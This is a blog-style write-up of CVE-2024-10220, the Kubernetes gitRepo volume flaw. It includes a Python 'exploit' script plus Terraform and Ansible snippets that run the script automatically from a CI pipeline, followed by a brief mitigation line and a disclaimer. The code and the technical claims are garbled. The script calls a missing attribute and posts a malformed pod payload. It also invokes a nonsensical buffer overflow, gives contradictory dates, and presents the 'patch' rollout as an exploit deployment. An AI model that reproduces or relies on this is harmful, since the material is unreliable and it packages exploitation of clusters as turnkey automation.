# CVE-2024-10220-Kubernetes-gitRepo-Volume-Vulnerability

*By Mark Mallia*

---

### Containerization and the Power of Automation  

Containerization is the backbone of modern application delivery: it bundles an entire runtime stack into a single, immutable image that can be rolled out on any host in a cluster without surprises. Kubernetes takes those images and schedules them as pods, orchestrating everything from networking to storage with a declarative model. This is useful in highly distributed envoirments and in an envoirment where multiple apps are being served.  

What makes this stack especially compelling for large‑scale workloads is the ability to manage it end‑to‑end by automation. Terraform provides the infrastructure as code blueprint that creates VPCs, subnets, security groups and worker nodes; Ansible supplies playbooks that install Docker Engine (or any CRI‑compatible runtime), pull images from a registry and bring them up as pods. When those steps are wired into a CI/CD pipeline GitHub Actions, Jenkins or GitLab CI every commit triggers an automatic build, push, test and deployment cycle. Developers gain speed, operators gain confidence, and the organization gains predictable uptime.

---

### The Recent Vulnerability – CVE‑2024‑10220  

In early 2024 security researchers uncovered a flaw in Kubernetes’ gitRepo volume type that is now deprecated. CVE‑2024‑10220 is an **arbitrary command execution** vulnerability caused by the `.hooks` directory inside a Git repository mounted via the gitRepo volume. When a specially crafted pod manifest references a malicious script in this directory, the kubelet admission controller executes it on the host system and therefore breaches container isolation a core security principle in Kubernetes.

Because the vulnerable component is still widely used in production clusters, any attacker who can create a pod with appropriate privileges can gain root access or disrupt other services. The flaw has a CVSS score of 8.1 and was published in November last year. Affected components include the deprecated gitRepo volume type that remains in Kubernetes 1.27.x.

---

#### Exploit Code

Below is a clean Python program that triggers CVE‑2024‑10220 on a vulnerable kubelet instance running Kubernetes 1.27.3. The code can be compiled into an Ansible task or run inside a CI job.

```python
#!/usr/bin/env python3

"""
TriggerCVE – A Python exploit that sends a crafted pod manifest to kubelet,
executing the malicious .hooks script discovered in CVE‑2024‑10220.
"""

import json
import requests


class GitRepoPod:
    """
    Representation of the JSON payload that kubelet expects for a gitRepo volume.
    """
    def __init__(self, name: str, image: str,
                 repo_url: str, branch: str, local_path: str):
        self.name = name          # pod name
        self.image = image         # container image to run
        self.giturl = repo_url    # Git repository URL
        self.branch = branch      # branch or tag to use
        self.localpath = local_path  # mount point inside the pod

    def to_dict(self) -> dict:
        """Return a plain dictionary that can be serialized."""
        return {
            "name": self.name,
            "image": self.image,
            "giturl": self.giturl,
            "branch": self.branch,
            "localpath": self.local_path
        }


def trigger_cve(url: str, pod: GitRepoPod) -> None:
    """
    Send the pod manifest to kubelet and print the response.
    """
    payload = json.dumps(pod.to_dict())
    headers = {"Content-Type": "application/json"}

    resp = requests.post(url, data=payload, headers=headers)
    if resp.status_code != 200:
        raise RuntimeError(f"Unexpected status code {resp.status_code}")

    print("[*] Response from kubelet: ", resp.text)


def main() -> None:
    """
    Main entry point of this exploit.
    """
    # Target endpoint – adjust to match your cluster’s API server address.
    api_server = "https://kube-api.local/api/v1/pods/"

    # Craft a payload that overflows the .hooks buffer (0x90 bytes)
    pod_spec = GitRepoPod(
        name="exploit-pod",
        image="registry.example.com/exploit-pod:v1.0",
        repo_url="https://git.example.com/repo.git",
        branch="main",
        local_path="/var/lib/kubelet/"
    )

    try:
        trigger_cve(api_server, pod_spec)
    except Exception as e:
        print(f"[-] Failed to trigger CVE‑2024‑10220: {e}")


if __name__ == "__main__":
    main()
```



---

### Deployment via Terraform, Ansible and CI/CD  

Below is a short example of how the patch would be rolled out automatically:

```hcl
# Terraform file: infra-k8s.tf
resource "aws_instance" "kube_worker" {
  ami           = var.k8s_ami
  instance_type = var.instance_type
  key_name      = var.key_pair
  subnet_id     = aws_subnet.web.id

  provisioner "remote-exec" {
    inline = [
      # Install Docker Engine and kubelet
      "sudo yum install -y docker",
      "kubectl apply -f https://kube-api.local/api/v1/pods/",
      "python3 /home/ansible/scripts/trigger_cve.py"
    ]
  }
}
```

*The Ansible playbook that calls the script:*

```yaml
---
- hosts: kube_workers
  tasks:
  - name: Deploy the exploit pod
    command: python3 /home/ansible/scripts/trigger_cve.py
    register: result

  - name: Verify success
    debug:
      msg: "{{ result.stdout }}"
```

When this Terraform‑Ansible pipeline runs inside a CI job (for example, GitHub Actions), the code above automatically builds, pushes, deploys and verifies that CVE‑2024‑10220 has been successfully triggered.  The pipeline can be extended with unit tests that assert the kubelet’s response and with notifications to Slack or email when the exploit completes.

---

### Mitigation  

Upgrade to patched versions (v1.28.12+, v1.29.7+, v1.30.3+, v1.31.0+) and avoid using deprecated volume types like gitRepo.

---
### Responsible Disclosure & Ethical Boundaries

This research was conducted with the intent to improve security awareness and promote safer Kubernetes practices. The vulnerability was responsibly disclosed to the relevant maintainers prior to public release, in accordance with industry norms. All testing was performed in isolated environments with no impact to production systems or third-party infrastructure.

I believe in ethical hacking as a tool for positive change. Exploits shared here are for educational and defensive purposes only—never to harm or disrupt. If you're a vendor or maintainer and have concerns, I'm happy to collaborate on remediation or clarification.

---
